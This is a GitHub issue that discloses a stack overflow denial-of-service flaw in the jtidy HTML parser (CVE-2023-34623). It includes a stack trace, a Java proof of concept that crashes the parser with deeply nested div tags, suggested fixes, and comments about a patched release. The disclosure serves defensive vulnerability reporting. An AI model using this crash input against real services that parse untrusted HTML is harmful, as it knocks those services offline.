Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stack overflow error caused by jtidy parsing of untrusted Html String #4

Open
PoppingSnack opened this issue Jun 6, 2023 · 4 comments

Comments

@PoppingSnack
Copy link

Stack overflow error caused by jtidy parsing of untrusted Html String

Description

Using jtidy to parse untrusted Html String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at java.base/java.nio.charset.Charset.lookup(Charset.java:457)
	at java.base/java.nio.charset.Charset.isSupported(Charset.java:503)
	at java.base/java.lang.StringCoding.lookupCharset(StringCoding.java:101)
	at java.base/java.lang.StringCoding.decode(StringCoding.java:234)
	at java.base/java.lang.String.<init>(String.java:467)
	at org.w3c.tidy.TidyUtils.getString(TidyUtils.java:658)
	at org.w3c.tidy.Lexer.getToken(Lexer.java:2343)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2051)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)

PoC

        <dependency>
            <groupId>net.sf.jtidy</groupId>
            <artifactId>jtidy</artifactId>
            <version>r938</version>
        </dependency>
import org.w3c.tidy.Tidy;

import java.io.StringReader;

public class PoC {
    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "<div>", "</div>", "");


    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String htmlData = TOO_DEEP_DOC;
        try (StringReader stringReader = new StringReader(htmlData);){
            Tidy tidy = new Tidy();
            tidy.parse(stringReader, System.out);
        } catch (Exception e) {
        }
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))

@carnil
Copy link

carnil commented Jun 19, 2023

CVE-2023-34623 has been assigned for this issue.

@haumacher
Copy link

haumacher commented Jun 30, 2023

You could change your coordinates to

<dependency>
    <groupId>com.github.jtidy</groupId>
    <artifactId>jtidy</artifactId>
    <version>1.0.4</version>
</dependency>

to get a fixed version. See https://github.com/jtidy/jtidy.

@kadampriyanka1109
Copy link

kadampriyanka1109 commented Aug 8, 2023

I'm using jtidy-1.0.4 still facing CVE-2023-34623 issue.

The dependency I'm using:

com.github.jtidy jtidy 1.0.4

The owasp dependency-check version I'm using is 8.3.1. @haumacher can you check whether the CVE is really fixed or not ?

jtidy_cve

@BrunoBehrmann
Copy link

For me, it was enough to change the formatting of my html file and apply some defaults.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants